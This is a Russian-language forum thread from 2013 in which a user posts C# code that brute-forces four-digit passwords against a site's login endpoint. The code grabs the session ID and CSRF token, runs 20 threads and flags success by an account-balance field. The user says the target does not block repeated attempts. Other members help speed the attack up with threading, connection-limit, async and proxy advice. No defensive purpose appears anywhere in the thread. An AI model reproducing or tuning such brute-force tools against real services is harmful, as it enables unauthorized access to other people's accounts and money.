C# многопотоки и bruteforce

slejpni · 10.12.2013, 10:47

Всем доброго времени суток, столкнулся с проблемой при написании банального брутфорса, точней с проблемой при переписании с perl скрипта на C#

Дилема в том, что perl отрабатывает в 20 потоков ~ 100 p\s за 3 секунды
На C# этот же вариант отрабатывает ~ 10-15 p\s

Просто хотелось бы, что бы вы глянули на куски кода, может где-то я ошибся?

Код:

        private void button1_Click(object sender, EventArgs e)
        {
            Thread tr = new Thread(delegate()
            {
                string ans = SendPost("https://site", "", 0, "");
                Match sidregex = new Regex(@"(sid=\S+;)", RegexOptions.Compiled | RegexOptions.IgnoreCase).Match(ans);
                sid = sidregex.Groups[1].Value;

                Invoke(new ParametrizedMethodInvoker(debuger), "SID: " + sid);

                ans = SendPost("https://site/login", "", 0, sid);
                sidregex = new Regex(@"""csrf_token"", '(\S+)'", RegexOptions.Compiled | RegexOptions.IgnoreCase).Match(ans);
                token = sidregex.Groups[1].Value;

                Invoke(new ParametrizedMethodInvoker(debuger), "Token: " + token);

                for (int i = 0; i < 20; i++)
                    (new Thread(new ThreadStart(brute))).Start();

            });
            tr.Start(); 
        }

В потоке вызывается цикл, где идёт перебор диапазона 1000 - 9999

Код:

        public void brute()
        {
          double pwd;
          int flag = 0;
          int i = 0;


          while (true)
          {
              lock (ACClocker)
              {
                  if (flag == 1 || ACCs.Count == 0)
                  {
                      break;
                  }

                  pwd = ACCs.Dequeue();
              }
              
              string ans = SendPost("https://site/auth/enter", "login=login&password="+pwd.toString(), 1, sid);

              if (ans.Contains("oBalanceSum"))
              {
                  MessageBox.Show(pwd.ToString());
                  flag = 1;
              }
          }
        }

NerdyCodingKid · 10.12.2013, 11:03

1. Вероятно, так-же тормозит работу поиск подстроки.
2. Используй StringBuilder для конкатенации строк (хотя тут можно было-бы вообще все нужные пароли/запросы просто создать в памяти заранее - пусть бы ушло пару мегабайт на строки, но получилось-бы быстрее)
3. Что есть AccLocker? Зачем потокам тут блочить друг друга?
4. Неужели до сих пор существуют ресурсы, что не блочат кучу попыток авторизации с одного айпи?

~~warl0ck~~ · 10.12.2013, 11:06

может у тебя по дефолту максимальное кол-во соединений 2?

Yukikaze · 10.12.2013, 11:25

Цитата:

Сообщение от NerdyCodingKid


	3. Что есть AccLocker? Зачем потокам тут блочить друг друга?

так из очереди же аккаунты тянет, операция не атомарная, приходится делать ее таковой локом

Добавлено через 3 минуты
Кстати, о самой проблеме, а что в методе SendPost? Кроме него может тормозить только Invoke ибо идет обращение к интерфейсу, а это затратно

NerdyCodingKid · 10.12.2013, 12:33

Цитата:

Сообщение от Yukikaze


	так из очереди же аккаунты тянет, операция не атомарная, приходится делать ее таковой локом

А в чём проблема? Почему нельзя сделать несколько очередей для разных потоков, чтобы они друг друга не придерживали?

Yukikaze · 10.12.2013, 12:41

Почему нельзя, можно, но это не рационально в плане распределения задач. К примеру мы разделили пул задач на 5 очередей, по одному на каждый поток. Первый и пятый потоки закончили свою работу раньше других и ушли в простой, с оставшейся работой расправляются уже 3 потока вместо 5, а например если еще один поток почистит свой пул то вообще 2 потока останется

NerdyCodingKid · 10.12.2013, 13:01

М. И? А не получится ли так, что оставшиеся два потока получат то время, которое отжирали другие три, когда эти три закончат свою работу?

Sinyss · 10.12.2013, 13:18

Цитата:

Сообщение от NerdyCodingKid


	М. И? А не получится ли так, что оставшиеся два потока получат то время, которое отжирали другие три, когда эти три закончат свою работу?

Всё упирается в скорость сети, все оптимизации парса и тд. сталкиваются с тем, что выполнение парса это 0.5ms, а веб запрос 50ms+... Именно потому лучше что бы работало как можно больше потоков одновременно...

NerdyCodingKid · 10.12.2013, 13:21

Здравая мысль. В таком случае, стоит пускать каждый запрос асинхронно.

Sinyss · 10.12.2013, 13:25

Цитата:

Сообщение от NerdyCodingKid


	Здравая мысль. В таком случае, стоит пускать каждый запрос асинхронно.

Абсолютно асинхронно не выйдет. Допустим у нас идет брут, многопоток, прокси. Вроде всё просто... но 2х факторная авторизация и если еще 1 поток использует тот же IP то может возникнуть конфликт... одновременный доступ с 1го IP...

Yukikaze · 10.12.2013, 13:28

В чем смысл асинхронности запроса если начать обрабатывать данные ты сможешь только после того как их получишь, только код усложняется
ЗЫ Распараллеливание != асинхронность

slejpni · 10.12.2013, 13:38

Цитата:

Сообщение от warl0ck


	может у тебя по дефолту максимальное кол-во соединений 2?

эмм.. я не ограничивал кол-во коннектов.. где глянуть?

Цитата:

Сообщение от NerdyCodingKid


	может у тебя по дефолту максимальное кол-во соединений 2? 1. Вероятно, так-же тормозит работу поиск подстроки. 2. Используй StringBuilder для конкатенации строк (хотя тут можно было-бы вообще все нужные пароли/запросы просто создать в памяти заранее - пусть бы ушло пару мегабайт на строки, но получилось-бы быстрее) 3. Что есть AccLocker? Зачем потокам тут блочить друг друга? 4. Неужели до сих пор существуют ресурсы, что не блочат кучу попыток авторизации с одного айпи?

1,2 кхм, я не задумывался над этим.. на сколько критичен такой метод?
в perl я использовал регулярку для поиска строки. Можете привести пример, если не сложно!?..

3. AccLocker как и сказали выше для перебора словаря.
По сути там массив чисел от 1000 до 9999 - если можно как-то по другому их перебрать, дайте знать пожалуйста..

4. Слава богам, да.. есть такой ресурс.. ради которого нужно переписать скрипт.. =)

Цитата:

Сообщение от Yukikaze


	Кстати, о самой проблеме, а что в методе SendPost? Кроме него может тормозить только Invoke ибо идет обращение к интерфейсу, а это затратно

кхм, есть два инвока.. для отслеживания прогресса. кхм, попробую убрать.. но нужно как-то всё таки знать сколько отработано.. =(

Цитата:

Сообщение от Yukikaze


	Здравая мысль. В таком случае, стоит пускать каждый запрос асинхронно.

Можете подсказать как реализовать или в какую сторон копать?

Yukikaze · 10.12.2013, 13:41

Цитата:

Сообщение от slejpni


	кхм, есть два инвока.. для отслеживания прогресса. кхм, попробую убрать..

то есть возможность торможения из за реализации метода SendPost вы даже не рассматриваете?

~~warl0ck~~ · 10.12.2013, 13:42

Цитата:

Сообщение от slejpni


	эмм.. я не ограничивал кол-во коннектов.. где глянуть?

[Ссылки могут видеть только зарегистрированные пользователи. ]

NerdyCodingKid · 10.12.2013, 13:42

Цитата:

Сообщение от Sinyss


	одновременный доступ с 1го IP...

Э...Т.е., тащемта, например, я немогу зайти одновременно в двух вкладках на одну страницу в браузере, например?

Добавлено через 2 минуты

Цитата:

Сообщение от slejpni


	[COLOR="White"] Можете подсказать как реализовать или в какую сторон копать?

[Ссылки могут видеть только зарегистрированные пользователи. ] первый что нагуглился. Осмотрел по диагонали, выглядит правдоподобно.

C# многопотоки и bruteforce

Вопросы и ответы, обсуждения